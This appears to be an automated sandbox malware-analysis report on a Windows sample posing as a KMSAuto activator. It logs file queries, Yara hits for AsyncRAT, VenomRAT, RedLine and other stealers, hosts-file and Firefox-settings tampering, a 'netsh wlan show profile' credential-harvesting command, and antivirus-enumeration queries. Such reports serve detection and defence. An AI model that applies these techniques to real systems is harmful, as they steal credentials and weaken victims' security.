Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\ProgramData\KMSAuto\accc.exe VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\jqnnpe.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\xj40xovMsm.exe

Code function: 0_2_00007FF68A1962FC GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,GetTickCount64,QueryPerformanceCounter,

0_2_00007FF68A1962FC

Source: C:\Windows\explorer.exe

Code function: 2_2_0F3C6DC0 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,??3@YAXPEAX@Z,

2_2_0F3C6DC0

Source: C:\Windows\explorer.exe

Code function: 2_2_0F3C6DC0 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,??3@YAXPEAX@Z,

2_2_0F3C6DC0

Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 14.0.5087.tmp.update.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.5087.tmp.update.exe.2aa51fc.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.5087.tmp.update.exe.2aa51fc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5087.tmp.update.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match	File source: 19.0.5E16.tmp.aaa.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5E16.tmp.aaa.exe PID: 7640, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, type: DROPPED

Modifies the hosts file

Source: C:\Windows\System32\relog.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Overwrites Mozilla Firefox settings

Source: C:\Windows\System32\relog.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js			Jump to behavior
Source: C:\Windows\System32\relog.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js			Jump to behavior

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Source: 5E16.tmp.aaa.exe, 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, 5E16.tmp.aaa.exe.2.dr	Binary or memory string: MSASCui.exe
Source: 4336.tmp.Server.exe, 00000006.00000002.3223679486.000000000535A000.00000004.00000020.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2822722381.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2979244152.00000000077EA000.00000004.00000020.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2937106455.0000000006672000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: 5E16.tmp.aaa.exe, 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, 5E16.tmp.aaa.exe.2.dr	Binary or memory string: procexp.exe
Source: 5E16.tmp.aaa.exe, 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, 5E16.tmp.aaa.exe.2.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected AveMaria stealer

Source: Yara match

File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR

Yara detected MicroClip

Source: Yara match

File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 24.2.svchost.exe.6d60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.3950838.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.3950838.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.6c60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.6c60000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.6d60000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3174046241.0000000003807000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3217843417.0000000006D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RL STEALER

Source: Yara match	File source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2583636643.0000000003146000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2583636643.00000000030DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2583636643.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 20.0.62AB.tmp.build.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000000.1945315404.0000000000A72000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 62AB.tmp.build.exe PID: 7672, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe, type: DROPPED

Yara detected StormKitty Stealer

Source: Yara match	File source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
